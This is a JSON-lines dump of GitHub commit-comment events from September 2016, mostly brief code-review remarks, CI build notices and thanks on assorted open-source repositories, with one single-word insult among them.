{"id":"4564347396","type":"CommitCommentEvent","actor":{"login":"R0han78"},"repo":{"name":"ankit451/myfirst"},"payload":{"comment":{"id":19026054,"position":null,"line":null,"path":null,"commit_id":"1ac0ea51388eda5aac95ebf91bc0d3548f0928e6","created_at":"2016-09-14T20:22:00Z","updated_at":"2016-09-14T20:22:00Z","body":"chutiya"}},"created_at":"2016-09-14T20:22:00Z"}
{"id":"4564348776","type":"CommitCommentEvent","actor":{"login":"dakrone"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19026060,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-14T20:22:15Z","updated_at":"2016-09-14T20:22:15Z","body":"@clyfe that'd be totally great to me, I think the default should be `repeated` then. Are you interested in implementing this?"}},"created_at":"2016-09-14T20:22:15Z"}
{"id":"4564350418","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19026062,"position":84,"line":29,"path":"src/about.cpp","commit_id":"476027f239f2c86169ad088bbfe6024c0ad2d1f6","created_at":"2016-09-14T20:22:32Z","updated_at":"2016-09-14T20:22:32Z","body":"You don't need `= config()` - that's implied if nothing else is specified."}},"created_at":"2016-09-14T20:22:32Z"}
{"id":"4564352987","type":"CommitCommentEvent","actor":{"login":"emilyashley"},"repo":{"name":"MapStory/mapstory-geonode"},"payload":{"comment":{"id":19026067,"position":null,"line":null,"path":null,"commit_id":"4393d9e5c443150a068097b678cdfc3e99052dcd","created_at":"2016-09-14T20:23:00Z","updated_at":"2016-09-14T20:23:00Z","body":"closes https://github.com/MapStory/mapstory/issues/1355"}},"created_at":"2016-09-14T20:23:00Z"}
{"id":"4564353582","type":"CommitCommentEvent","actor":{"login":"dphiffer"},"repo":{"name":"whosonfirst-data/whosonfirst-data-venue-us-ny"},"payload":{"comment":{"id":19026069,"position":null,"line":null,"path":null,"commit_id":"f67cc5487e388c1a3f986dff856ecb2fd3aaa4be","created_at":"2016-09-14T20:23:08Z","updated_at":"2016-09-14T20:23:08Z","body":"For now I'll go with 3 letters, lowercased: `sun, mon, tue, wed, thu, fri, sat`"}},"created_at":"2016-09-14T20:23:08Z"}
{"id":"4564357670","type":"CommitCommentEvent","actor":{"login":"grahamboree"},"repo":{"name":"edwardloveall/Peaks"},"payload":{"comment":{"id":19026078,"position":null,"line":null,"path":null,"commit_id":"5fc75a0d262d75c79a16349c13ccfd1894d4cf43","created_at":"2016-09-14T20:23:51Z","updated_at":"2016-09-14T20:23:51Z","body":"Nice! 👍 "}},"created_at":"2016-09-14T20:23:51Z"}
{"id":"4564358812","type":"CommitCommentEvent","actor":{"login":"thisisaaronland"},"repo":{"name":"whosonfirst-data/whosonfirst-data-venue-us-ny"},"payload":{"comment":{"id":19026082,"position":null,"line":null,"path":null,"commit_id":"f67cc5487e388c1a3f986dff856ecb2fd3aaa4be","created_at":"2016-09-14T20:24:03Z","updated_at":"2016-09-14T20:24:03Z","body":"Cool - will you be sure to update `whosonfirst-properties` with a relevant discussion"}},"created_at":"2016-09-14T20:24:03Z"}
{"id":"4564360704","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026087,"position":91,"line":91,"path":"backend/src/main/java/ru/avito/HTTPDownloader/HttpDownloadUtility.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T20:24:24Z","updated_at":"2016-09-14T20:24:24Z","body":"Здесь можно многое сказать, но главный вопрос, который возникает глядя сюда, это зачем?\r\nЗачем писать 100 строк говнокода, при этому используя крайне медленную технику записи в файл, вместо например [nio](https://docs.oracle.com/javase/7/docs/api/java/nio/channels/package-summary.html).\r\nА по хорошему это вообще необходимо удалить, и использовать в коде готовое решение, например вот это [commons.apache.io](https://commons.apache.org/proper/commons-io/javadocs/api-release/index.html?org/apache/commons/io/package-summary.html), есть уже готовый метод:\r\n\r\n```java\r\n\tcopyURLToFile(URL source, File destination)\r\n```\r\nПлюсы такого решения:\r\n1. Избавления от ненужного говнакода\r\n2. использование хорошего решения, протестированного сотнями людей\r\n3. экономия времени и сил\r\nМинусы:\r\n1. тянем еще одну зависимость\r\nНо это сложно минусом назвать на самом деле, по сравнению с тем что имеем сейчас."}},"created_at":"2016-09-14T20:24:24Z"}
{"id":"4564364184","type":"CommitCommentEvent","actor":{"login":"carrilloandre"},"repo":{"name":"carrilloandre/hello-world"},"payload":{"comment":{"id":19026097,"position":null,"line":null,"path":null,"commit_id":"c6a6054dd3d648d73848f1375a86639c49a8dc48","created_at":"2016-09-14T20:25:03Z","updated_at":"2016-09-14T20:25:03Z","body":"v.0.2.0.0"}},"created_at":"2016-09-14T20:25:03Z"}
{"id":"4564364860","type":"CommitCommentEvent","actor":{"login":"fadushin"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":19026100,"position":null,"line":null,"path":null,"commit_id":"a58e8f75dd5cd11e360ac1974534832907e934d6","created_at":"2016-09-14T20:25:12Z","updated_at":"2016-09-14T20:25:12Z","body":"@borshop retry"}},"created_at":"2016-09-14T20:25:12Z"}
{"id":"4564366176","type":"CommitCommentEvent","actor":{"login":"Silvertower"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19026107,"position":null,"line":null,"path":null,"commit_id":"79578eab4063e77369659e120d484cd42e519766","created_at":"2016-09-14T20:25:25Z","updated_at":"2016-09-14T20:25:25Z","body":"The SQL file name has a tab in front of it, for whatever reason."}},"created_at":"2016-09-14T20:25:25Z"}
{"id":"4564368903","type":"CommitCommentEvent","actor":{"login":"dirk-thomas"},"repo":{"name":"ros2/rmw"},"payload":{"comment":{"id":19026117,"position":15,"line":15,"path":"rmw/test/CMakeLists.txt","commit_id":"1b28064c8ba75809a2e097a4d8951331022803f9","created_at":"2016-09-14T20:25:55Z","updated_at":"2016-09-14T20:25:55Z","body":"I created a ticket upstream for the warning plugin of Jenkins: https://issues.jenkins-ci.org/browse/JENKINS-38215"}},"created_at":"2016-09-14T20:25:55Z"}
{"id":"4564369984","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026124,"position":13,"line":13,"path":"backend/src/main/java/ru/avito/HTTPDownloader/HttpDownloader.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T20:26:07Z","updated_at":"2016-09-14T20:26:07Z","body":"```java\r\n        String fileURL =\"http://storage.mp3.cc/download/48841558/ZFM4VDQ0WFNhTlV0VTJaK09OK1dLall0VGFGc3RiMVg4bkp0QXZWRlRRdS90S0w2cTBqeSs4WlJVb0NhQXJxZDNKcmxVaVhoakk0RVVMUGlkRDJ3MWR4UGl0dnViOTBFaklnTldEbitpUE5aamxZZXh4OGdPZ014UUtCYUJ6aHE/indaqo-boom-boom-boom-gabry-ponte-edit_(mp3.cc).mp3\";\r\n         String saveDir =\"c:\\\\java\";\r\n```\r\nВсе это добро должно быть в properties например, или в каком нибудь xml, но точно не здесь...\r\n"}},"created_at":"2016-09-14T20:26:07Z"}
{"id":"4564371651","type":"CommitCommentEvent","actor":{"login":"carrilloandre"},"repo":{"name":"carrilloandre/hello-world"},"payload":{"comment":{"id":19026129,"position":null,"line":null,"path":null,"commit_id":"c6a6054dd3d648d73848f1375a86639c49a8dc48","created_at":"2016-09-14T20:26:25Z","updated_at":"2016-09-14T20:26:25Z","body":"v.0.2.0.0"}},"created_at":"2016-09-14T20:26:25Z"}
{"id":"4564372762","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19026132,"position":null,"line":null,"path":null,"commit_id":"4178122b706883b671be8206d5c44dad899eb6d9","created_at":"2016-09-14T20:26:36Z","updated_at":"2016-09-14T20:26:36Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 430](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1210&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-14T20:26:36Z"}
{"id":"4564374570","type":"CommitCommentEvent","actor":{"login":"carrilloandre"},"repo":{"name":"carrilloandre/hello-world"},"payload":{"comment":{"id":19026135,"position":null,"line":null,"path":null,"commit_id":"2c17c928e5c52f232ee75d0c15930531a7604861","created_at":"2016-09-14T20:26:56Z","updated_at":"2016-09-14T20:26:56Z","body":"The version is actually v.0.2.0.1"}},"created_at":"2016-09-14T20:26:56Z"}
{"id":"4564376737","type":"CommitCommentEvent","actor":{"login":"cldougl"},"repo":{"name":"plotly/plotly.github.io"},"payload":{"comment":{"id":19026139,"position":30,"line":24,"path":"_posts/plotly2/2016-08-12-how-to-add-collaborators-in-Plotly-2.md","commit_id":"6bf0d18d3c63ebdf80776448eb5da9d0e07e2616","created_at":"2016-09-14T20:27:21Z","updated_at":"2016-09-14T20:27:21Z","body":"So for sharing, let's say you can do so publicly or with the secret link, the idea of private is that no one sees it. "}},"created_at":"2016-09-14T20:27:21Z"}
{"id":"4564378361","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026145,"position":16,"line":16,"path":"backend/src/main/java/ru/avito/HTTPDownloader/HttpDownloader.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T20:27:38Z","updated_at":"2016-09-14T20:27:38Z","body":"```java\r\nnew HttpDownloadUtility().downloadFile(fileURL, saveDir);\r\n```\r\nА какой смысл создавать объект, в котором нет даже не одного поля, для таких вещей есть статические методы."}},"created_at":"2016-09-14T20:27:38Z"}
{"id":"4564379241","type":"CommitCommentEvent","actor":{"login":"zwieblauch"},"repo":{"name":"stascorp/rdpwrap"},"payload":{"comment":{"id":19026147,"position":null,"line":null,"path":null,"commit_id":"743b53ca169085b67aa8b2efa561e3238efedcc7","created_at":"2016-09-14T20:27:47Z","updated_at":"2016-09-14T20:27:47Z","body":"Thanks for the last update. Now it works with my Win 10 Home Edition. \r\nNice work man!!"}},"created_at":"2016-09-14T20:27:47Z"}
{"id":"4564382013","type":"CommitCommentEvent","actor":{"login":"Aster89"},"repo":{"name":"sqwishy/vim-gdscript"},"payload":{"comment":{"id":19026153,"position":null,"line":null,"path":null,"commit_id":"657a9868628342f1cf9df101bfa2ec6ddcf04892","created_at":"2016-09-14T20:28:18Z","updated_at":"2016-09-14T20:28:18Z","body":"So I suggest to remove that line, order to provide a usable plugin for others, like me."}},"created_at":"2016-09-14T20:28:18Z"}
{"id":"4564382238","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19026154,"position":null,"line":null,"path":null,"commit_id":"4178122b706883b671be8206d5c44dad899eb6d9","created_at":"2016-09-14T20:28:20Z","updated_at":"2016-09-14T20:28:20Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 430](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1210&buildTypeId=XbimEssentials_XbimEssentials) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:44"}},"created_at":"2016-09-14T20:28:20Z"}
{"id":"4564386168","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026167,"position":18,"line":18,"path":"backend/src/main/java/ru/avito/HTTPDownloader/HttpDownloader.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T20:29:00Z","updated_at":"2016-09-14T20:29:00Z","body":"```java\r\ne.printStackTrace();\r\n```\r\nИ зачем это вообще надо? Если не в лог пишешь, откуда ты потом это будешь читать?"}},"created_at":"2016-09-14T20:29:00Z"}
{"id":"4564388199","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19026175,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-14T20:29:20Z","updated_at":"2016-09-14T20:29:20Z","body":"uh, have a very old preinstalled one here (2.14.7)\r\n\r\nSo let us both install the latest (4.5.0) and see if this is the problem :) ?"}},"created_at":"2016-09-14T20:29:20Z"}
{"id":"4564389992","type":"CommitCommentEvent","actor":{"login":"MarioJor06-10"},"repo":{"name":"GustavoRuiz9/ProjectDrizzle"},"payload":{"comment":{"id":19026183,"position":null,"line":null,"path":null,"commit_id":"cdacd0927431e555227b21312ce232f1eae4bd3c","created_at":"2016-09-14T20:29:39Z","updated_at":"2016-09-14T20:29:39Z","body":"y si dejo meter esos requiere asi?\r\nno te forman problema?\r\n"}},"created_at":"2016-09-14T20:29:39Z"}
{"id":"4564392188","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026184,"position":25,"line":25,"path":"backend/src/main/java/ru/avito/datasource/DBConnection.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T20:30:03Z","updated_at":"2016-09-14T20:30:03Z","body":"Надо это дело логировать."}},"created_at":"2016-09-14T20:30:03Z"}
{"id":"4564392626","type":"CommitCommentEvent","actor":{"login":"dblock"},"repo":{"name":"dblock/mongoid-history"},"payload":{"comment":{"id":19026185,"position":null,"line":null,"path":null,"commit_id":"75c200fba411530047c1c23a750aff05f93ac836","created_at":"2016-09-14T20:30:10Z","updated_at":"2016-09-14T20:30:10Z","body":"Thanks @aq1018! I'll clean this all up."}},"created_at":"2016-09-14T20:30:10Z"}
{"id":"4564392891","type":"CommitCommentEvent","actor":{"login":"bochecha"},"repo":{"name":"libretro/bsnes-libretro"},"payload":{"comment":{"id":19026187,"position":null,"line":null,"path":null,"commit_id":"17cbfb15205f7e7ea54574ce5db63c0a7cd96841","created_at":"2016-09-14T20:30:14Z","updated_at":"2016-09-14T20:30:14Z","body":"Same problem here. @sjnewbury can you open a pull request so we can all benefit from your patch? :)"}},"created_at":"2016-09-14T20:30:14Z"}
{"id":"4564397260","type":"CommitCommentEvent","actor":{"login":"DHOMD"},"repo":{"name":"VanirAOSP/vendor_huawei"},"payload":{"comment":{"id":19026198,"position":null,"line":null,"path":null,"commit_id":"6330c728fe4e595c4be8c7d61d4c04c24f975a64","created_at":"2016-09-14T20:30:57Z","updated_at":"2016-09-14T20:30:57Z","body":".... yea probably needs to be refactored for 7.0"}},"created_at":"2016-09-14T20:30:57Z"}
{"id":"4564398021","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19026201,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T20:31:05Z","updated_at":"2016-09-14T20:31:05Z","body":"@ilteroi here's the spot I was talking about:\r\n\r\n```\r\nint iWaitTime = 100;\r\n\t\t\t\t\t\t\t\tif(!isNetworkMultiPlayer())\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tiWaitTime = 10;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\tif(m_iTurnSlice - player.GetLastSliceMoved() > iWaitTime)\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tCvUnitEntry* entry = GC.getUnitInfo(pReadyUnit->getUnitType());\r\n\t\t\t\t\t\t\t\t\tif(entry)\r\n\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\tCvString strTemp = entry->GetDescription();\r\n\t\t\t\t\t\t\t\t\t\tCvString szAssertMessage;\r\n\t\t\t\t\t\t\t\t\t\tszAssertMessage.Format(\r\n\t\t\t\t\t\t\t\t\t\t    \"GAME HANG - Please show Ed and send save. Stuck units will have their turn ended so game can advance. [DETAILS: Player %i %s. First stuck unit is %s at (%d, %d)]\",\r\n\t\t\t\t\t\t\t\t\t\t    player.GetID(), player.getName(), strTemp.GetCString(), pReadyUnit->getX(), pReadyUnit->getY());\r\n\t\t\t\t\t\t\t\t\t\tCvAssertMsg(false, szAssertMessage);\r\n\t\t\t\t\t\t\t\t\t\tNET_MESSAGE_DEBUG_OSTR_ALWAYS(szAssertMessage);\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\tplayer.EndTurnsForReadyUnits();\r\n\t\t\t\t\t\t\t\t}\r\n```"}},"created_at":"2016-09-14T20:31:05Z"}
{"id":"4564398366","type":"CommitCommentEvent","actor":{"login":"Dkmister"},"repo":{"name":"robsmayer/historia-web-pt"},"payload":{"comment":{"id":19026202,"position":null,"line":null,"path":null,"commit_id":"2685b09b66c0bee35bd01fe2f0e12258505bb24f","created_at":"2016-09-14T20:31:10Z","updated_at":"2016-09-14T20:31:10Z","body":"@robsmayer acho que podes deixar randomly lose em português (perda randômica) e deixar o termo entre parenteses em italico. Use _palavradesejada_ entre underlines como o exemplo já dado.\r\nDe resto, gostei muito do teu empenho, continue assim :+1: "}},"created_at":"2016-09-14T20:31:10Z"}
{"id":"4564399698","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19026203,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T20:31:23Z","updated_at":"2016-09-14T20:31:23Z","body":"So this is in CvGame line 9095."}},"created_at":"2016-09-14T20:31:23Z"}
{"id":"4564401604","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"kvirc/KVIrc"},"payload":{"comment":{"id":19026210,"position":null,"line":null,"path":null,"commit_id":"eba87768bc7394b5dc5d62c5e6274fae53039ab8","created_at":"2016-09-14T20:31:42Z","updated_at":"2016-09-14T20:31:42Z","body":"I thought about that after this commit, cant be bothered putting much into this, Im not sure if these also do hostnames `\\r!nch\\r%Q\\r` or not\r\n\r\nIll try both though."}},"created_at":"2016-09-14T20:31:42Z"}
{"id":"4564406147","type":"CommitCommentEvent","actor":{"login":"joegallo"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19026220,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-14T20:32:24Z","updated_at":"2016-09-14T20:32:24Z","body":"IIRC meta hints don't work quite right if you are calling a function to get the value (rather than using a literal value inline). In that case you need to fallback to the (IMHO) unmemorable and unattractive with-meta function -- seems like something that would trip people up. \r\n\r\nThat is (and again, IIRC):\r\n```\r\n(http/get \"http://example.com\" {:query-params {:field ^:indexed (identity [\"a\" \"b\" \"c\"])}})\r\n```\r\nwould silently not do what you want, you'd need to remember that the correct form is actually:\r\n```\r\n(http/get \"http://example.com\" {:query-params {:field (with-meta (identity [\"a\" \"b\" \"c\"] {:indexed true})}})\r\n```"}},"created_at":"2016-09-14T20:32:24Z"}
{"id":"4564407056","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19026224,"position":31,"line":110,"path":"src/logger.c","commit_id":"304da88035303e12696deadfb4ed6a3ecb41c4c9","created_at":"2016-09-14T20:32:33Z","updated_at":"2016-09-14T20:32:33Z","body":"I saw that on a build bot just now. It's that Redmond joke of an OS that's not portable.\r\n\r\nApparently it doesn't support S_ISUID, we'll just add a define next to the mode_t you did earlier. You or me?"}},"created_at":"2016-09-14T20:32:33Z"}
{"id":"4564407278","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19026226,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T20:32:35Z","updated_at":"2016-09-14T20:32:35Z","body":"Also, @ilteroi, do you have luajit installed? Could that have any bearing on things?"}},"created_at":"2016-09-14T20:32:35Z"}
{"id":"4564408724","type":"CommitCommentEvent","actor":{"login":"shanear"},"repo":{"name":"department-of-veterans-affairs/caseflow-certification"},"payload":{"comment":{"id":19026233,"position":15,"line":71,"path":"app/controllers/certifications_controller.rb","commit_id":"a37813b76ca1bc2a88e6d19e08744abdec2b575f","created_at":"2016-09-14T20:32:50Z","updated_at":"2016-09-14T20:32:50Z","body":"@orischwartz Would there be any harm in changing this to `\"{{user_id}}_{{vacols_id}}_form8` instead of using the session id?"}},"created_at":"2016-09-14T20:32:50Z"}
{"id":"4564411054","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19026237,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T20:33:16Z","updated_at":"2016-09-14T20:33:16Z","body":"The entire ::updateMoves() seems a bit overly complicated IMO."}},"created_at":"2016-09-14T20:33:16Z"}
{"id":"4564413589","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026242,"position":29,"line":29,"path":"backend/src/main/java/ru/avito/datasource/DBConnection.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T20:33:40Z","updated_at":"2016-09-14T20:33:40Z","body":"Этот метод надо на самом деле удалить, он не нужен  по сути... надо сделать статическим втором метод, что бы он сразу же возвращал коннект.\r\nтогда можно будет в коде его статическим импортом писать просто getConnection()"}},"created_at":"2016-09-14T20:33:40Z"}
{"id":"4564414545","type":"CommitCommentEvent","actor":{"login":"Ste74"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19026244,"position":null,"line":null,"path":null,"commit_id":"11d7db6bfd39562489684084b85cebd727cd8b34","created_at":"2016-09-14T20:33:51Z","updated_at":"2016-09-14T20:33:51Z","body":"But , probably my misunderstanding , yaml list for netinstall not used for install minimal and  vanilla version of de or wm ? "}},"created_at":"2016-09-14T20:33:51Z"}
{"id":"4564421471","type":"CommitCommentEvent","actor":{"login":"torwald12"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19026262,"position":null,"line":null,"path":null,"commit_id":"ab921e392bd06cd1fa8be04fcb192f89e6cb82d0","created_at":"2016-09-14T20:35:03Z","updated_at":"2016-09-14T20:35:03Z","body":"Since this commit rebuild of openNFR doesn´t work. If I revert this commit local, it works."}},"created_at":"2016-09-14T20:35:03Z"}
{"id":"4564423377","type":"CommitCommentEvent","actor":{"login":"zjusbo"},"repo":{"name":"zjusbo/appengine"},"payload":{"comment":{"id":19026267,"position":null,"line":null,"path":null,"commit_id":"9dfd5f12aa3e43735fb2b7ad28e7b66aa94eb6a7","created_at":"2016-09-14T20:35:22Z","updated_at":"2016-09-14T20:35:22Z","body":"Adding IsInTransaction API to datastore package."}},"created_at":"2016-09-14T20:35:22Z"}
{"id":"4564425505","type":"CommitCommentEvent","actor":{"login":"mehtank"},"repo":{"name":"mehtank/sumosims"},"payload":{"comment":{"id":19026272,"position":null,"line":null,"path":null,"commit_id":"a7859443d98d13c3d97d9928cf6866578e982eeb","created_at":"2016-09-14T20:35:43Z","updated_at":"2016-09-14T20:35:43Z","body":"Resolves #20 "}},"created_at":"2016-09-14T20:35:43Z"}
{"id":"4564426071","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"callea2/bookingz"},"payload":{"comment":{"id":19026273,"position":null,"line":null,"path":null,"commit_id":"8ac3cfdd3031cdc6934f3ca5e18a0e4acfc252d2","created_at":"2016-09-14T20:35:50Z","updated_at":"2016-09-14T20:35:50Z","body":"I'm okay with this. Great job. "}},"created_at":"2016-09-14T20:35:50Z"}
{"id":"4564427070","type":"CommitCommentEvent","actor":{"login":"raticate"},"repo":{"name":"niclabs/tchsm"},"payload":{"comment":{"id":19026278,"position":null,"line":null,"path":null,"commit_id":"325eaf5920f41dd589772e10dea98e057c51914b","created_at":"2016-09-14T20:36:02Z","updated_at":"2016-09-14T20:36:02Z","body":"lgbt"}},"created_at":"2016-09-14T20:36:02Z"}
{"id":"4564427563","type":"CommitCommentEvent","actor":{"login":"cldougl"},"repo":{"name":"plotly/plotly.github.io"},"payload":{"comment":{"id":19026279,"position":47,"line":38,"path":"_posts/plotly2/2016-08-12-how-to-add-collaborators-in-Plotly-2.md","commit_id":"6bf0d18d3c63ebdf80776448eb5da9d0e07e2616","created_at":"2016-09-14T20:36:09Z","updated_at":"2016-09-14T20:36:09Z","body":"it's probably better to say if you wish to collaborate on an older plot .. instead of share in this sentence (so as not to confuse the concepts at this point)"}},"created_at":"2016-09-14T20:36:09Z"}
{"id":"4564428233","type":"CommitCommentEvent","actor":{"login":"ktbyers"},"repo":{"name":"ktbyers/netmiko"},"payload":{"comment":{"id":19026282,"position":null,"line":null,"path":null,"commit_id":"2c590de6331091ca6563d198f5b2c2b7cd4ebbf5","created_at":"2016-09-14T20:36:16Z","updated_at":"2016-09-14T20:36:16Z","body":"Did you install Netmiko?\r\n\r\npip install netmiko==1.0.0\r\n\r\nor 'python setup.py install' from the new clone."}},"created_at":"2016-09-14T20:36:16Z"}
{"id":"4564429621","type":"CommitCommentEvent","actor":{"login":"sampathweb"},"repo":{"name":"bobtian19/dsp"},"payload":{"comment":{"id":19026285,"position":11,"line":60,"path":"05a-python.md","commit_id":"dd3dba621372dbc48f9b4a689c763bcaa9817e13","created_at":"2016-09-14T20:36:29Z","updated_at":"2016-09-14T20:36:29Z","body":"@bobtian19 Good use of Comprehension."}},"created_at":"2016-09-14T20:36:29Z"}
{"id":"4564434059","type":"CommitCommentEvent","actor":{"login":"webron"},"repo":{"name":"swagger-api/swagger-ui"},"payload":{"comment":{"id":19026293,"position":null,"line":null,"path":null,"commit_id":"183c67a7c5f1a8bbd7a5e6571d69319d02c71ba9","created_at":"2016-09-14T20:37:17Z","updated_at":"2016-09-14T20:37:17Z","body":"Well, that's not good. Browser compatibility FTW! @bodnia, @fehguy - thoughts?"}},"created_at":"2016-09-14T20:37:17Z"}
{"id":"4564434398","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026298,"position":22,"line":22,"path":"backend/src/main/java/ru/avito/model/AuthModel.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T20:37:20Z","updated_at":"2016-09-14T20:37:20Z","body":"Это тоже надо на самом деле переделать, что бы было в соотвествии со [стандартом](http://www.oracle.com/technetwork/java/codeconvtoc-136057.html) отформатировать все."}},"created_at":"2016-09-14T20:37:20Z"}
{"id":"4564436150","type":"CommitCommentEvent","actor":{"login":"sqwishy"},"repo":{"name":"sqwishy/vim-gdscript"},"payload":{"comment":{"id":19026302,"position":null,"line":null,"path":null,"commit_id":"657a9868628342f1cf9df101bfa2ec6ddcf04892","created_at":"2016-09-14T20:37:39Z","updated_at":"2016-09-14T20:37:39Z","body":"Yeah probably. Do people use my fork? Its hardly different from upstream and I thought I made a pull request to get the other changeset merged in.\n\nIf you submit a pull request I'll merge it or if you can't be bothered I might remember to when I get home later today.\n\nOn September 14, 2016 1:28:19 PM PDT, Enrico Maria De Angelis <notifications@github.com> wrote:\n>So I suggest to remove that line, order to provide a usable plugin for\n>others, like me.\n>\n>-- \n>You are receiving this because you authored the thread.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/sqwishy/vim-gdscript/commit/657a9868628342f1cf9df101bfa2ec6ddcf04892#commitcomment-19026153\n"}},"created_at":"2016-09-14T20:37:39Z"}
{"id":"4564436739","type":"CommitCommentEvent","actor":{"login":"beheh"},"repo":{"name":"HearthSim/HSReplay.net"},"payload":{"comment":{"id":19026303,"position":7,"line":7,"path":"hsreplaynet/decks/admin.py","commit_id":"8f9993529a0199bac9320dff4682d5707fe34803","created_at":"2016-09-14T20:37:45Z","updated_at":"2016-09-14T20:37:45Z","body":"`DeckAdmin`"}},"created_at":"2016-09-14T20:37:45Z"}
{"id":"4564436811","type":"CommitCommentEvent","actor":{"login":"FlavianeRibeiro"},"repo":{"name":"FlavianeRibeiro/t-lix.github.io"},"payload":{"comment":{"id":19026304,"position":null,"line":null,"path":null,"commit_id":"fba2cc05e7fcfad3754b3e03b4ae7a39cc213087","created_at":"2016-09-14T20:37:46Z","updated_at":"2016-09-14T20:37:46Z","body":"mudanças"}},"created_at":"2016-09-14T20:37:46Z"}
{"id":"4564437316","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19026308,"position":null,"line":null,"path":null,"commit_id":"11d7db6bfd39562489684084b85cebd727cd8b34","created_at":"2016-09-14T20:37:52Z","updated_at":"2016-09-14T20:37:52Z","body":"@Ste74 \r\n\r\nYou decide, you control it with unpackfs and netinstall in profile.conf"}},"created_at":"2016-09-14T20:37:52Z"}
{"id":"4564437348","type":"CommitCommentEvent","actor":{"login":"poojajoshi23"},"repo":{"name":"poojajoshi23/hello-world"},"payload":{"comment":{"id":19026309,"position":null,"line":null,"path":null,"commit_id":"93ea1f68cc020b55846f423e74c7fa08b383f6af","created_at":"2016-09-14T20:37:52Z","updated_at":"2016-09-14T20:37:52Z","body":"mer"}},"created_at":"2016-09-14T20:37:52Z"}
